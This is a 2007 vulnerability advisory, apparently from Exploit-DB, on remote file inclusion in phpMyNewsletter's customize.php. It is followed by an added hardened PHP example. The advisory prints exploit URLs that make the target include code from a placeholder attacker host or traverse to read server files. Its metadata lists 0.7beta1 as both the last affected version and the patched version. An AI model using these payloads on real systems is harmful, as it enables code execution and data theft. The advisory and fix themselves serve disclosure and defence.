vendor: phpMyNewsletter
by: frog-m@n
CVSS: 7.5 HIGH
Include file vulnerability
CWE: 98
Product Name: phpMyNewsletter
Affected Version From: 2000.6.10
Affected Version To: 0.7beta1
Patch Exists: YES
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

phpMyNewsletter include file vulnerability

The vulnerability allows an attacker to include arbitrary files from the server or from a remote location, potentially leading to remote code execution or information disclosure. The exploit can be triggered by manipulating the 'l' parameter in the customize.php script. The attacker can provide a remote file containing malicious code or specify a relative path to view sensitive files on the server.

Mitigation:

The vulnerability has been patched in the latest version (0.7beta1) of phpMyNewsletter. Users are advised to update to the latest version to mitigate the risk.
Source

Exploit-DB raw data:

Product : phpMyNewsletter
Tested version : 0.6.10
Website : http://gregory.kokanosky.free.fr/phpmynewsletter/
Problem : include file

PHP code :
°°°°°°°°°°
---- /include/customize.php ----
<?
$langfile = $l;

include $l;
?>
---- /include/customize.php ----

Exploit :
°°°°°°°°°
http://[target]/include/customize.php?l=http://[attacker]/code.txt&text=Hello%20World
With, in http://[attacker]/code.txt :
<? echo $text; ?>

or
http://[target]/include/customize.php?l=../path/file/to/view

Patch :
°°°°°°°
Author has been alerted and the last version (0.7beta1) has been patched.

More details
- in French :
http://www.frog-man.org/tutos/phpMyNewsletter.txt
- translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FphpMyNewsletter.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-m@n 

# milw0rm.com [2007-04-04]
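
For contrast with the `include $l;` shown in the advisory, the following is an added example of a hardened include; it is not the project's actual 0.7beta1 patch and is not code from the advisory. The `lang/` directory layout, the `<name>.php` file naming, the allowlist entries and the default language are assumptions made for illustration.

```php
<?php
// Added example: hardened form of the include in /include/customize.php.
// ASSUMPTIONS (not from the project): language files live in ./lang/ and are
// named <name>.php; the allowlist entries and DEFAULT_LANG are hypothetical.
declare(strict_types=1);

const LANG_DIR      = __DIR__ . '/lang';
const DEFAULT_LANG  = 'english';
const ALLOWED_LANGS = ['english', 'francais'];

/**
 * Map the user-supplied 'l' value to a file inside LANG_DIR.
 * The request value is used only as a lookup key, never as a path.
 */
function resolve_lang_file($requested): string
{
    // Arrays (?l[]=x) and other non-string input fall back to the default.
    $key = is_string($requested) ? $requested : DEFAULT_LANG;

    // Strict allowlist match: URLs, "../" sequences, stream wrappers and
    // null bytes can never equal one of the fixed names.
    if (!in_array($key, ALLOWED_LANGS, true)) {
        $key = DEFAULT_LANG;
    }

    // Defence in depth: the resolved file must exist and sit under LANG_DIR.
    $real = realpath(LANG_DIR . '/' . $key . '.php');
    $base = realpath(LANG_DIR);
    if ($real === false || $base === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('language file not available');
    }

    return $real;
}

// Read the parameter explicitly from $_GET instead of relying on a global
// $l populated by register_globals, which is what the original code did.
// Keeping allow_url_include = Off in php.ini additionally blocks remote
// includes if some other include path is ever missed.
include resolve_lang_file($_GET['l'] ?? DEFAULT_LANG);
```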